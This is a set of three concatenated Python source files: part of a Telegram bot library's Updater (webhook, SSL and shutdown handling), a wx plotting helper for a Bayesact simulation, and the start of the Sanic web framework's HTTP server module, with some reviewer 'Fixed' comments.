            cur_interval = poll_interval

        sleep(cur_interval)
@staticmethod
def _increase_poll_interval(current_interval):
# increase waiting times on subsequent errors up to 30secs
if current_interval == 0:
current_interval = 1
elif current_interval < 30:
current_interval += current_interval / 2
elif current_interval > 30:
current_interval = 30
return current_interval
def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean,
                   webhook_url, allowed_updates):
    """Thread target of thread 'updater' when running in webhook mode.

    Starts the local webhook server and, when SSL is terminated by this
    process, registers the webhook (with the public certificate) at Telegram.
    """
    self.logger.debug('Updater thread started')
    use_ssl = cert is not None and key is not None
    if not url_path.startswith('/'):
        url_path = '/{0}'.format(url_path)

    # Create and start server
    self.httpd = WebhookServer((listen, port), WebhookHandler, self.update_queue, url_path,
                               self.bot)

    if use_ssl:
        self._check_ssl_cert(cert, key)

        # DO NOT CHANGE: Only set webhook if SSL is handled by library
        if not webhook_url:
            webhook_url = self._gen_webhook_url(listen, port, url_path)

        # Fixed: the original passed ``open(cert, 'rb')`` inline and leaked
        # the file handle; close it once bootstrapping is done.
        with open(cert, 'rb') as cert_file:
            self._bootstrap(
                max_retries=bootstrap_retries,
                clean=clean,
                webhook_url=webhook_url,
                cert=cert_file,
                allowed_updates=allowed_updates)
    elif clean:
        self.logger.warning("cleaning updates is not supported if "
                            "SSL-termination happens elsewhere; skipping")

    self.httpd.serve_forever(poll_interval=1)
def _check_ssl_cert(self, cert, key):
    """Sanity-check the certificate with the ``openssl`` CLI (when available)
    and wrap the webhook server's socket for SSL.

    Raises:
        TelegramError: If openssl rejects the certificate or the SSL socket
            cannot be initialised.
    """
    # Check SSL-Certificate with openssl, if possible
    try:
        # Fixed: the original passed ``open(os.devnull, 'wb')`` and leaked
        # the handle; subprocess.DEVNULL needs no cleanup.
        exit_code = subprocess.call(
            ["openssl", "x509", "-text", "-noout", "-in", cert],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.STDOUT)
    except OSError:
        # openssl binary not installed; skip the check and trust the file.
        exit_code = 0

    # Fixed: the original compared ``exit_code is 0`` -- identity of an int
    # literal is a CPython implementation detail; use value equality.
    if exit_code == 0:
        try:
            # NOTE(review): ssl.wrap_socket is deprecated (removed in 3.12);
            # migrating to ssl.SSLContext.wrap_socket is a follow-up.
            self.httpd.socket = ssl.wrap_socket(
                self.httpd.socket, certfile=cert, keyfile=key, server_side=True)
        except ssl.SSLError as error:
            self.logger.exception('Failed to init SSL socket')
            raise TelegramError(str(error))
    else:
        raise TelegramError('SSL Certificate invalid')
@staticmethod
def _gen_webhook_url(listen, port, url_path):
return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)
def _bootstrap(self, max_retries, clean, webhook_url, allowed_updates, cert=None):
    """Register (or clear) the webhook with Telegram, retrying on failure.

    Args:
        max_retries (:obj:`int`): < 0 retries forever, 0 means a single
            attempt, > 0 retries up to that many times.
        clean (:obj:`bool`): Drop pending updates before registering.
        webhook_url (:obj:`str`): URL to register; ``''`` clears the webhook
            (polling mode).
        allowed_updates: Forwarded to the bot's ``set_webhook``.
        cert: Optional public-certificate file object for self-signed setups.

    Raises:
        Unauthorized, InvalidToken: Re-raised immediately -- retrying cannot
            fix bad credentials.
        TelegramError: Once the retry budget is exhausted.
    """
    retries = 0
    while 1:
        try:
            if clean:
                # Disable webhook for cleaning
                self.bot.delete_webhook()
                self._clean_updates()
                sleep(1)

            self.bot.set_webhook(
                url=webhook_url, certificate=cert, allowed_updates=allowed_updates)
        except (Unauthorized, InvalidToken):
            # Credential problems will not go away on retry; surface them.
            raise
        except TelegramError:
            msg = 'error in bootstrap phase; try={0} max_retries={1}'.format(retries,
                                                                             max_retries)
            if max_retries < 0 or retries < max_retries:
                # Retry budget left (negative means unlimited).
                self.logger.warning(msg)
                retries += 1
            else:
                self.logger.exception(msg)
                raise
        else:
            break
        # Pause between attempts so we do not hammer the API.
        sleep(1)
def _clean_updates(self):
    """Drain every pending update from the Telegram servers."""
    self.logger.debug('Cleaning updates from Telegram server')
    batch = self.bot.get_updates()
    while batch:
        # Asking for the id after the last one acknowledges the whole batch.
        next_offset = batch[-1].update_id + 1
        batch = self.bot.get_updates(next_offset)
def stop(self):
    """Stops the polling/webhook thread, the dispatcher and the job queue."""
    # Order matters: stop scheduling new jobs first, then the updater
    # thread, the dispatcher, and finally join the worker threads.
    self.job_queue.stop()
    with self.__lock:
        if self.running or self.dispatcher.has_running_threads:
            self.logger.debug('Stopping Updater and Dispatcher...')

            # Flips the flag the polling/webhook loops check.
            self.running = False

            self._stop_httpd()
            self._stop_dispatcher()
            self._join_threads()

            # Stop the Request instance only if it was created by the Updater
            if self._request:
                self._request.stop()
def _stop_httpd(self):
    # Shut down the webhook server, if one is running. ``shutdown`` blocks
    # until the request currently being served (if any) has finished.
    if self.httpd:
        self.logger.debug('Waiting for current webhook connection to be '
                          'closed... Send a Telegram message to the bot to exit '
                          'immediately.')
        self.httpd.shutdown()
        self.httpd = None
def _stop_dispatcher(self):
    # Ask the Dispatcher to finish its queue and exit its worker loop.
    self.logger.debug('Requesting Dispatcher to stop...')
    self.dispatcher.stop()
def _join_threads(self):
    # Block until every thread started via ``_init_thread`` has terminated,
    # then forget them so the Updater can be started again.
    for thr in self.__threads:
        self.logger.debug('Waiting for {0} thread to end'.format(thr.name))
        thr.join()
        self.logger.debug('{0} thread has ended'.format(thr.name))
    self.__threads = []
def signal_handler(self, signum, frame):
    """Handler installed by :meth:`idle`: stops the Updater gracefully.

    If a stop signal arrives while the Updater is *not* running, the
    process is terminated immediately instead.
    """
    self.is_idle = False
    if self.running:
        self.stop()
        if self.user_sig_handler:
            # Chain to the user-provided handler, if one was registered.
            self.user_sig_handler(signum, frame)
    else:
        self.logger.warning('Exiting immediately!')
        # ``os._exit`` skips cleanup handlers on purpose: a hard exit.
        import os
        os._exit(1)
def idle(self, stop_signals=(SIGINT, SIGTERM, SIGABRT)):
    """Blocks until one of the signals are received and stops the updater.

    Args:
        stop_signals (:obj:`iterable`): Iterable containing signals from the signal module that
            should be subscribed to. Updater.stop() will be called on receiving one of those
            signals. Defaults to (``SIGINT``, ``SIGTERM``, ``SIGABRT``).
    """
    for sig in stop_signals:
        signal(sig, self.signal_handler)

    self.is_idle = True

    # ``signal_handler`` flips ``is_idle`` to False when a signal arrives.
    while self.is_idle:
        sleep(1)
|
cPlotBayesactSim.py | # Plots bayesactsim by parsing it
import subprocess
import os
import re
import time
import signal
import threading
import wx
from cBayesactSimBuffer import cBayesactSimBuffer
from cEnum import eAxes, eTurn, eEPA
from cConstants import cPlotConstants, cEPAConstants
class cPlotBayesactSim(object):
    """Plots a bayesact simulation by parsing the simulator's output.

    Feeds learner/simulator fundamental and tau samples to one or more
    attached EPA plot panels, optionally driven by a background parser
    thread (``cBayesactSimBuffer``).
    """

    # The axis items are enumerations of the EPA
    def __init__(self, iPlotEPAPanel):
        self.m_PlotEPAPanels = [iPlotEPAPanel]
        self.m_KeepAlive = True
        self.m_Lock = threading.Lock()

        self.m_LearnerFundamentalSamples = []
        self.m_SimulatorFundamentalSamples = []
        self.m_LearnerTauSamples = []
        self.m_SimulatorTauSamples = []
        self.m_LearnerPreviousAction = []
        self.m_SimulatorPreviousAction = []

        self.m_Sleep = False
        self.m_Parser = None
        self.m_ParserThread = None

    def plotBayesactSim(self):
        """Truncate stored samples to the plot limit and redraw all panels."""
        if ((None == self.m_LearnerFundamentalSamples) and (None == self.m_LearnerTauSamples)):
            return

        # To plot only a certain number of samples.
        # Remember that this is a transpose of the samples, so the length of
        # the learn/simul samples array is 9, the 3 pairs of epa
        for i in range(len(self.m_LearnerFundamentalSamples)):
            self.m_LearnerFundamentalSamples[i] = self.m_LearnerFundamentalSamples[i][:cPlotConstants.m_MaxPlotSamples]
        for i in range(len(self.m_SimulatorFundamentalSamples)):
            self.m_SimulatorFundamentalSamples[i] = self.m_SimulatorFundamentalSamples[i][:cPlotConstants.m_MaxPlotSamples]
        for i in range(len(self.m_LearnerTauSamples)):
            self.m_LearnerTauSamples[i] = self.m_LearnerTauSamples[i][:cPlotConstants.m_MaxPlotSamples]
        for i in range(len(self.m_SimulatorTauSamples)):
            self.m_SimulatorTauSamples[i] = self.m_SimulatorTauSamples[i][:cPlotConstants.m_MaxPlotSamples]

        for plotPanel in self.m_PlotEPAPanels:
            if (eEPA.fundamental == plotPanel.m_PlotType):
                plotPanel.plotEPA(self.m_LearnerFundamentalSamples, self.m_SimulatorFundamentalSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
            else:
                plotPanel.plotEPA(self.m_LearnerTauSamples, self.m_SimulatorTauSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)

    # Replots and assumes the samples were already truncated to the max plot
    # samples by plotBayesactSim above
    def replotOnPanel(self, iPlotEPAPanel):
        if (eEPA.fundamental == iPlotEPAPanel.m_PlotType):
            iPlotEPAPanel.plotEPA(self.m_LearnerFundamentalSamples, self.m_SimulatorFundamentalSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)
        else:
            iPlotEPAPanel.plotEPA(self.m_LearnerTauSamples, self.m_SimulatorTauSamples, self.m_LearnerPreviousAction, self.m_SimulatorPreviousAction)

    def sleepProcess(self):
        """Pause the parser process."""
        self.m_Sleep = True
        self.m_Parser.sleepProcess()

    def continueProcess(self):
        """Resume the parser process."""
        self.m_Sleep = False
        self.m_Parser.continueProcess()

    def killProcess(self):
        """Stop the parser permanently."""
        self.sleepProcess()
        self.m_Parser.m_KeepAlive = False

    def bufferData(self):
        """Start a parser thread and busy-wait while reporting the threshold."""
        self.m_Parser = cBayesactSimBuffer()
        self.m_ParserThread = threading.Thread(target=self.m_Parser.run)
        self.m_ParserThread.daemon = True
        self.m_ParserThread.start()
        while (self.m_Parser.m_BufferThreshold < len(self.m_Parser.m_SamplesBuffer)):
            # Fixed: was a Python 2 ``print`` statement (syntax error on Py3).
            print(self.m_Parser.m_BufferThreshold)

    def plotBufferedData(self):
        """Plot repeatedly until the parser's sample buffer is drained."""
        while (0 < len(self.m_Parser.m_SamplesBuffer)):
            self.plotBayesactSim()
            print(self.m_Parser.m_BufferThreshold)

    def plotFile(self, iFileName):
        """Parse a recorded simulation file and plot its buffered contents."""
        self.m_Parser = cBayesactSimBuffer()
        self.m_Parser.parseFile(iFileName)
        self.plotBufferedData()

    def clearPlots(self):
        """Wipe and redraw every attached panel."""
        for panel in self.m_PlotEPAPanels:
            panel.clearAxes()
            panel.redrawAxes()

    def runOnPlot(self):
        """Continuously pull samples from a live parser and plot them."""
        # It is possible that you may preload data for the plot in the buffer
        # and then assign this plotter to a plot.
        # This statement here prevents it though.
        if (None == self.m_PlotEPAPanels[0]):
            # Thread ends
            return

        self.m_Parser = cBayesactSimBuffer()
        self.m_ParserThread = threading.Thread(target=self.m_Parser.run, kwargs={"iFileName": None})
        self.m_ParserThread.daemon = True
        self.m_ParserThread.start()

        while (self.m_KeepAlive):
            while (not (self.m_Sleep)):
                # Fixed typo: was ``fundamantals``.
                fundamentals = self.m_Parser.getSamples()
                # NOTE(review): ``setSamples`` is not defined in this class;
                # presumably provided by a subclass or monkey-patch -- verify.
                self.setSamples(fundamentals[eTurn.learner], fundamentals[eTurn.simulator])
                self.plotBayesactSim()

        self.killProcess()
        # self.m_ParserThread.join()

    def setFundamentals(self, iLearnerFundamentalSamples, iSimulatorFundamentalSamples):
        """Replace the stored fundamental samples for both agents."""
        self.m_LearnerFundamentalSamples = iLearnerFundamentalSamples
        self.m_SimulatorFundamentalSamples = iSimulatorFundamentalSamples

    def setTau(self, iLearnerTauSamples, iSimulatorTauSamples):
        """Replace the stored tau samples for both agents."""
        self.m_LearnerTauSamples = iLearnerTauSamples
        self.m_SimulatorTauSamples = iSimulatorTauSamples
|
server.py | import asyncio
import multiprocessing
import os
import sys
import traceback
from collections import deque
from functools import partial
from inspect import isawaitable
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser # type: ignore
from httptools.parser.errors import HttpParserError # type: ignore
from sanic.compat import Header, ctrlc_workaround_for_windows
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
# Prefer uvloop's faster event-loop implementation when it is installed;
# silently fall back to the stdlib loop otherwise.
try:
    import uvloop  # type: ignore

    if not isinstance(asyncio.get_event_loop_policy(), uvloop.EventLoopPolicy):
        asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
    pass

# Windows lacks loop.add_signal_handler; see the register_sys_signals
# branch in ``serve``.
OS_IS_WINDOWS = os.name == "nt"
class Signal:
    # Flag flipped by ``serve`` during shutdown; checked by
    # ``HttpProtocol.keep_alive`` so no connection stays open while
    # the server is stopping.
    stopped = False
class HttpProtocol(asyncio.Protocol):
    """
    This class provides a basic HTTP implementation of the sanic framework.
    """

    __slots__ = (
        # app
        "app",
        # event loop, connection
        "loop",
        "transport",
        "connections",
        "signal",
        # request params
        "parser",
        "request",
        "url",
        "headers",
        # request config
        "request_handler",
        "request_timeout",
        "response_timeout",
        "keep_alive_timeout",
        "request_max_size",
        "request_buffer_queue_size",
        "request_class",
        "is_request_stream",
        "error_handler",
        # enable or disable access log purpose
        "access_log",
        # connection management
        "_total_request_size",
        "_request_timeout_handler",
        "_response_timeout_handler",
        "_keep_alive_timeout_handler",
        "_last_request_time",
        "_last_response_time",
        "_is_stream_handler",
        "_not_paused",
        "_request_handler_task",
        "_request_stream_task",
        "_keep_alive",
        "_header_fragment",
        "state",
        "_body_chunks",
    )

    def __init__(
        self,
        *,
        loop,
        app,
        signal=None,
        connections=None,
        state=None,
        **kwargs,
    ):
        asyncio.set_event_loop(loop)
        self.loop = loop
        # asyncio primitives deprecate the explicit ``loop`` kwarg on 3.7+.
        deprecated_loop = self.loop if sys.version_info < (3, 7) else None
        self.app = app
        self.transport = None
        self.request = None
        self.parser = None
        self.url = None
        self.headers = None
        # Fixed: the original default was ``signal=Signal()`` -- a mutable
        # default shared by every instance constructed without one.
        self.signal = signal if signal is not None else Signal()
        self.access_log = self.app.config.ACCESS_LOG
        self.connections = connections if connections is not None else set()
        self.request_handler = self.app.handle_request
        self.error_handler = self.app.error_handler
        self.request_timeout = self.app.config.REQUEST_TIMEOUT
        self.request_buffer_queue_size = (
            self.app.config.REQUEST_BUFFER_QUEUE_SIZE
        )
        self.response_timeout = self.app.config.RESPONSE_TIMEOUT
        self.keep_alive_timeout = self.app.config.KEEP_ALIVE_TIMEOUT
        self.request_max_size = self.app.config.REQUEST_MAX_SIZE
        self.request_class = self.app.request_class or Request
        self.is_request_stream = self.app.is_request_stream
        self._is_stream_handler = False
        self._not_paused = asyncio.Event(loop=deprecated_loop)
        self._total_request_size = 0
        self._request_timeout_handler = None
        self._response_timeout_handler = None
        self._keep_alive_timeout_handler = None
        self._last_request_time = None
        self._last_response_time = None
        self._request_handler_task = None
        self._request_stream_task = None
        self._keep_alive = self.app.config.KEEP_ALIVE
        self._header_fragment = b""
        self.state = state if state else {}
        if "requests_count" not in self.state:
            self.state["requests_count"] = 0
        self._not_paused.set()
        self._body_chunks = deque()

    @property
    def keep_alive(self):
        """
        Check if the connection needs to be kept alive based on the params
        attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
        and :func:`HttpProtocol.parser.should_keep_alive`

        :return: ``True`` if connection is to be kept alive ``False`` else
        """
        return (
            self._keep_alive
            and not self.signal.stopped
            and self.parser.should_keep_alive()
        )

    # -------------------------------------------- #
    # Connection
    # -------------------------------------------- #

    def connection_made(self, transport):
        self.connections.add(self)
        self._request_timeout_handler = self.loop.call_later(
            self.request_timeout, self.request_timeout_callback
        )
        self.transport = transport
        self._last_request_time = time()

    def connection_lost(self, exc):
        self.connections.discard(self)
        # Cancel everything pending for this connection.
        if self._request_handler_task:
            self._request_handler_task.cancel()
        if self._request_stream_task:
            self._request_stream_task.cancel()
        if self._request_timeout_handler:
            self._request_timeout_handler.cancel()
        if self._response_timeout_handler:
            self._response_timeout_handler.cancel()
        if self._keep_alive_timeout_handler:
            self._keep_alive_timeout_handler.cancel()

    def pause_writing(self):
        self._not_paused.clear()

    def resume_writing(self):
        self._not_paused.set()

    def request_timeout_callback(self):
        # See the docstring in the RequestTimeout exception, to see
        # exactly what this timeout is checking for.
        # Check if elapsed time since request initiated exceeds our
        # configured maximum request timeout value
        time_elapsed = time() - self._last_request_time
        if time_elapsed < self.request_timeout:
            time_left = self.request_timeout - time_elapsed
            self._request_timeout_handler = self.loop.call_later(
                time_left, self.request_timeout_callback
            )
        else:
            if self._request_stream_task:
                self._request_stream_task.cancel()
            if self._request_handler_task:
                self._request_handler_task.cancel()
            self.write_error(RequestTimeout("Request Timeout"))

    def response_timeout_callback(self):
        # Check if elapsed time since response was initiated exceeds our
        # configured maximum request timeout value
        time_elapsed = time() - self._last_request_time
        if time_elapsed < self.response_timeout:
            time_left = self.response_timeout - time_elapsed
            self._response_timeout_handler = self.loop.call_later(
                time_left, self.response_timeout_callback
            )
        else:
            if self._request_stream_task:
                self._request_stream_task.cancel()
            if self._request_handler_task:
                self._request_handler_task.cancel()
            self.write_error(ServiceUnavailable("Response Timeout"))

    def keep_alive_timeout_callback(self):
        """
        Check if elapsed time since last response exceeds our configured
        maximum keep alive timeout value and if so, close the transport
        pipe and let the response writer handle the error.

        :return: None
        """
        time_elapsed = time() - self._last_response_time
        if time_elapsed < self.keep_alive_timeout:
            time_left = self.keep_alive_timeout - time_elapsed
            self._keep_alive_timeout_handler = self.loop.call_later(
                time_left, self.keep_alive_timeout_callback
            )
        else:
            logger.debug("KeepAlive Timeout. Closing connection.")
            self.transport.close()
            self.transport = None

    # -------------------------------------------- #
    # Parsing
    # -------------------------------------------- #

    def data_received(self, data):
        # Check for the request itself getting too large and exceeding
        # memory limits
        self._total_request_size += len(data)
        if self._total_request_size > self.request_max_size:
            self.write_error(PayloadTooLarge("Payload Too Large"))

        # Create parser if this is the first time we're receiving data
        if self.parser is None:
            assert self.request is None
            self.headers = []
            self.parser = HttpRequestParser(self)

        # requests count
        self.state["requests_count"] = self.state["requests_count"] + 1

        # Parse request chunk or close connection
        try:
            self.parser.feed_data(data)
        except HttpParserError:
            message = "Bad Request"
            if self.app.debug:
                message += "\n" + traceback.format_exc()
            self.write_error(InvalidUsage(message))

    def on_url(self, url):
        if not self.url:
            self.url = url
        else:
            self.url += url

    def on_header(self, name, value):
        # httptools may deliver header names in fragments; accumulate until
        # the matching value arrives.
        self._header_fragment += name

        if value is not None:
            if (
                self._header_fragment == b"Content-Length"
                and int(value) > self.request_max_size
            ):
                self.write_error(PayloadTooLarge("Payload Too Large"))
            try:
                value = value.decode()
            except UnicodeDecodeError:
                value = value.decode("latin_1")
            self.headers.append(
                (self._header_fragment.decode().casefold(), value)
            )

            self._header_fragment = b""

    def on_headers_complete(self):
        self.request = self.request_class(
            url_bytes=self.url,
            headers=Header(self.headers),
            version=self.parser.get_http_version(),
            method=self.parser.get_method().decode(),
            transport=self.transport,
            app=self.app,
        )
        # Remove any existing KeepAlive handler here,
        # It will be recreated if required on the new request.
        if self._keep_alive_timeout_handler:
            self._keep_alive_timeout_handler.cancel()
            self._keep_alive_timeout_handler = None

        if self.request.headers.get(EXPECT_HEADER):
            self.expect_handler()

        if self.is_request_stream:
            self._is_stream_handler = self.app.router.is_stream_handler(
                self.request
            )
            if self._is_stream_handler:
                self.request.stream = StreamBuffer(
                    self.request_buffer_queue_size
                )
                self.execute_request_handler()

    def expect_handler(self):
        """
        Handler for Expect Header.
        """
        expect = self.request.headers.get(EXPECT_HEADER)
        if self.request.version == "1.1":
            if expect.lower() == "100-continue":
                self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
            else:
                self.write_error(
                    HeaderExpectationFailed(f"Unknown Expect: {expect}")
                )

    def on_body(self, body):
        if self.is_request_stream and self._is_stream_handler:
            # body chunks can be put into asyncio.Queue out of order if
            # multiple tasks put concurrently and the queue is full in python
            # 3.7. so we should not create more than one task putting into the
            # queue simultaneously.
            self._body_chunks.append(body)
            if (
                not self._request_stream_task
                or self._request_stream_task.done()
            ):
                self._request_stream_task = self.loop.create_task(
                    self.stream_append()
                )
        else:
            self.request.body_push(body)

    async def body_append(self, body):
        if (
            self.request is None
            or self._request_stream_task is None
            or self._request_stream_task.cancelled()
        ):
            return

        if self.request.stream.is_full():
            self.transport.pause_reading()
            await self.request.stream.put(body)
            self.transport.resume_reading()
        else:
            await self.request.stream.put(body)

    async def stream_append(self):
        while self._body_chunks:
            body = self._body_chunks.popleft()
            if self.request.stream.is_full():
                self.transport.pause_reading()
                await self.request.stream.put(body)
                self.transport.resume_reading()
            else:
                await self.request.stream.put(body)

    def on_message_complete(self):
        # Entire request (headers and whole body) is received.
        # We can cancel and remove the request timeout handler now.
        if self._request_timeout_handler:
            self._request_timeout_handler.cancel()
            self._request_timeout_handler = None

        if self.is_request_stream and self._is_stream_handler:
            # A ``None`` chunk marks end-of-stream for the handler.
            self._body_chunks.append(None)
            if (
                not self._request_stream_task
                or self._request_stream_task.done()
            ):
                self._request_stream_task = self.loop.create_task(
                    self.stream_append()
                )
            return

        self.request.body_finish()
        self.execute_request_handler()

    def execute_request_handler(self):
        """
        Invoke the request handler defined by the
        :func:`sanic.app.Sanic.handle_request` method

        :return: None
        """
        self._response_timeout_handler = self.loop.call_later(
            self.response_timeout, self.response_timeout_callback
        )
        self._last_request_time = time()
        self._request_handler_task = self.loop.create_task(
            self.request_handler(
                self.request, self.write_response, self.stream_response
            )
        )

    # -------------------------------------------- #
    # Responding
    # -------------------------------------------- #

    def log_response(self, response):
        """
        Helper method provided to enable the logging of responses in case if
        the :attr:`HttpProtocol.access_log` is enabled.

        :param response: Response generated for the current request
        :type response: :class:`sanic.response.HTTPResponse` or
            :class:`sanic.response.StreamingHTTPResponse`
        :return: None
        """
        if self.access_log:
            extra = {"status": getattr(response, "status", 0)}

            if isinstance(response, HTTPResponse):
                extra["byte"] = len(response.body)
            else:
                extra["byte"] = -1

            extra["host"] = "UNKNOWN"
            if self.request is not None:
                if self.request.ip:
                    extra["host"] = f"{self.request.ip}:{self.request.port}"
                extra["request"] = f"{self.request.method} {self.request.url}"
            else:
                extra["request"] = "nil"

            access_logger.info("", extra=extra)

    def write_response(self, response):
        """
        Writes response content synchronously to the transport.
        """
        if self._response_timeout_handler:
            self._response_timeout_handler.cancel()
            self._response_timeout_handler = None
        # Fixed: default before the try -- if ``self.keep_alive`` raises
        # (e.g. parser already gone -> AttributeError), the original hit an
        # UnboundLocalError in ``finally`` which masked the real failure.
        # Defaulting to False means the connection is closed, the safe choice.
        keep_alive = False
        try:
            keep_alive = self.keep_alive
            self.transport.write(
                response.output(
                    self.request.version, keep_alive, self.keep_alive_timeout
                )
            )
            self.log_response(response)
        except AttributeError:
            logger.error(
                "Invalid response object for url %s, "
                "Expected Type: HTTPResponse, Actual Type: %s",
                self.url,
                type(response),
            )
            self.write_error(ServerError("Invalid response type"))
        except RuntimeError:
            if self.app.debug:
                logger.error(
                    "Connection lost before response written @ %s",
                    self.request.ip,
                )
            keep_alive = False
        except Exception as e:
            self.bail_out(f"Writing response failed, connection closed {e!r}")
        finally:
            if not keep_alive:
                self.transport.close()
                self.transport = None
            else:
                self._keep_alive_timeout_handler = self.loop.call_later(
                    self.keep_alive_timeout, self.keep_alive_timeout_callback
                )
                self._last_response_time = time()
                self.cleanup()

    async def drain(self):
        await self._not_paused.wait()

    async def push_data(self, data):
        self.transport.write(data)

    async def stream_response(self, response):
        """
        Streams a response to the client asynchronously. Attaches
        the transport to the response so the response consumer can
        write to the response as needed.
        """
        if self._response_timeout_handler:
            self._response_timeout_handler.cancel()
            self._response_timeout_handler = None
        # Fixed: same UnboundLocalError hazard as in ``write_response``.
        keep_alive = False
        try:
            keep_alive = self.keep_alive
            response.protocol = self
            await response.stream(
                self.request.version, keep_alive, self.keep_alive_timeout
            )
            self.log_response(response)
        except AttributeError:
            logger.error(
                "Invalid response object for url %s, "
                "Expected Type: HTTPResponse, Actual Type: %s",
                self.url,
                type(response),
            )
            self.write_error(ServerError("Invalid response type"))
        except RuntimeError:
            if self.app.debug:
                logger.error(
                    "Connection lost before response written @ %s",
                    self.request.ip,
                )
            keep_alive = False
        except Exception as e:
            self.bail_out(f"Writing response failed, connection closed {e!r}")
        finally:
            if not keep_alive:
                self.transport.close()
                self.transport = None
            else:
                self._keep_alive_timeout_handler = self.loop.call_later(
                    self.keep_alive_timeout, self.keep_alive_timeout_callback
                )
                self._last_response_time = time()
                self.cleanup()

    def write_error(self, exception):
        # An error _is_ a response.
        # Don't throw a response timeout, when a response _is_ given.
        if self._response_timeout_handler:
            self._response_timeout_handler.cancel()
            self._response_timeout_handler = None
        response = None
        try:
            response = self.error_handler.response(self.request, exception)
            version = self.request.version if self.request else "1.1"
            self.transport.write(response.output(version))
        except RuntimeError:
            if self.app.debug:
                logger.error(
                    "Connection lost before error written @ %s",
                    self.request.ip if self.request else "Unknown",
                )
        except Exception as e:
            self.bail_out(
                f"Writing error failed, connection closed {e!r}",
                from_error=True,
            )
        finally:
            if self.parser and (
                self.keep_alive or getattr(response, "status", 0) == 408
            ):
                self.log_response(response)
            try:
                self.transport.close()
            except AttributeError:
                logger.debug("Connection lost before server could close it.")

    def bail_out(self, message, from_error=False):
        """
        In case if the transport pipes are closed and the sanic app encounters
        an error while writing data to the transport pipe, we log the error
        with proper details.

        :param message: Error message to display
        :param from_error: If the bail out was invoked while handling an
            exception scenario.

        :type message: str
        :type from_error: bool

        :return: None
        """
        if from_error or self.transport is None or self.transport.is_closing():
            logger.error(
                "Transport closed @ %s and exception "
                "experienced during error handling",
                (
                    self.transport.get_extra_info("peername")
                    if self.transport is not None
                    else "N/A"
                ),
            )
            logger.debug("Exception:", exc_info=True)
        else:
            self.write_error(ServerError(message))
            logger.error(message)

    def cleanup(self):
        """This is called when KeepAlive feature is used,
        it resets the connection in order for it to be able
        to handle receiving another request on the same connection."""
        self.parser = None
        self.request = None
        self.url = None
        self.headers = None
        self._request_handler_task = None
        self._request_stream_task = None
        self._total_request_size = 0
        self._is_stream_handler = False

    def close_if_idle(self):
        """Close the connection if a request is not being sent or received

        :return: boolean - True if closed, false if staying open
        """
        if not self.parser and self.transport is not None:
            self.transport.close()
            return True
        return False

    def close(self):
        """
        Force close the connection.
        """
        if self.transport is not None:
            self.transport.close()
            self.transport = None
def trigger_events(events, loop):
    """Run each event callback; awaitables are run to completion on the loop.

    :param events: one or more sync or async functions to execute
    :param loop: event loop
    """
    for callback in events:
        outcome = callback(loop)
        if not isawaitable(outcome):
            continue
        loop.run_until_complete(outcome)
class AsyncioServer:
    """
    Wraps an asyncio server with functionality that might be useful to
    a user who needs to manage the server lifecycle manually.
    """

    __slots__ = (
        "loop",
        "serve_coro",
        "_after_start",
        "_before_stop",
        "_after_stop",
        "server",
        "connections",
    )

    def __init__(
        self,
        loop,
        serve_coro,
        connections,
        after_start,
        before_stop,
        after_stop,
    ):
        # Note, Sanic already called "before_server_start" events
        # before this helper was even created. So we don't need it here.
        self.loop = loop
        self.serve_coro = serve_coro
        self._after_start = after_start
        self._before_stop = before_stop
        self._after_stop = after_stop
        # Populated once the serve coroutine finishes in ``__await__``.
        self.server = None
        self.connections = connections

    def after_start(self):
        """Trigger "after_server_start" events"""
        trigger_events(self._after_start, self.loop)

    def before_stop(self):
        """Trigger "before_server_stop" events"""
        trigger_events(self._before_stop, self.loop)

    def after_stop(self):
        """Trigger "after_server_stop" events"""
        trigger_events(self._after_stop, self.loop)

    def is_serving(self):
        # False until the wrapped asyncio server has been awaited/started.
        if self.server:
            return self.server.is_serving()
        return False

    def wait_closed(self):
        # Returns the underlying server's wait_closed coroutine, or None
        # when the server never started.
        if self.server:
            return self.server.wait_closed()

    def close(self):
        # Begin shutdown; returns a task that completes once all
        # connections have drained (None if the server never started).
        if self.server:
            self.server.close()
            coro = self.wait_closed()
            task = asyncio.ensure_future(coro, loop=self.loop)
            return task

    def start_serving(self):
        if self.server:
            try:
                return self.server.start_serving()
            except AttributeError:
                # start_serving only exists on Python 3.7+ asyncio servers.
                raise NotImplementedError(
                    "server.start_serving not available in this version "
                    "of asyncio or uvloop."
                )

    def serve_forever(self):
        if self.server:
            try:
                return self.server.serve_forever()
            except AttributeError:
                # serve_forever only exists on Python 3.7+ asyncio servers.
                raise NotImplementedError(
                    "server.serve_forever not available in this version "
                    "of asyncio or uvloop."
                )

    def __await__(self):
        """Starts the asyncio server, returns AsyncServerCoro"""
        task = asyncio.ensure_future(self.serve_coro)
        while not task.done():
            yield
        self.server = task.result()
        return self
def serve(
    host,
    port,
    app,
    before_start=None,
    after_start=None,
    before_stop=None,
    after_stop=None,
    ssl=None,
    sock=None,
    reuse_port=False,
    loop=None,
    protocol=HttpProtocol,
    backlog=100,
    register_sys_signals=True,
    run_multiple=False,
    run_async=False,
    connections=None,
    signal=None,
    state=None,
    asyncio_server_kwargs=None,
):
    """Start asynchronous HTTP Server on an individual process.

    :param host: Address to host on
    :param port: Port to host on
    :param before_start: function to be executed before the server starts
                         listening. Takes arguments `app` instance and `loop`
    :param after_start: function to be executed after the server starts
                        listening. Takes arguments `app` instance and `loop`
    :param before_stop: function to be executed when a stop signal is
                        received before it is respected. Takes arguments
                        `app` instance and `loop`
    :param after_stop: function to be executed when a stop signal is
                       received after it is respected. Takes arguments
                       `app` instance and `loop`
    :param ssl: SSLContext
    :param sock: Socket for the server to accept connections from
    :param reuse_port: `True` for multiple workers
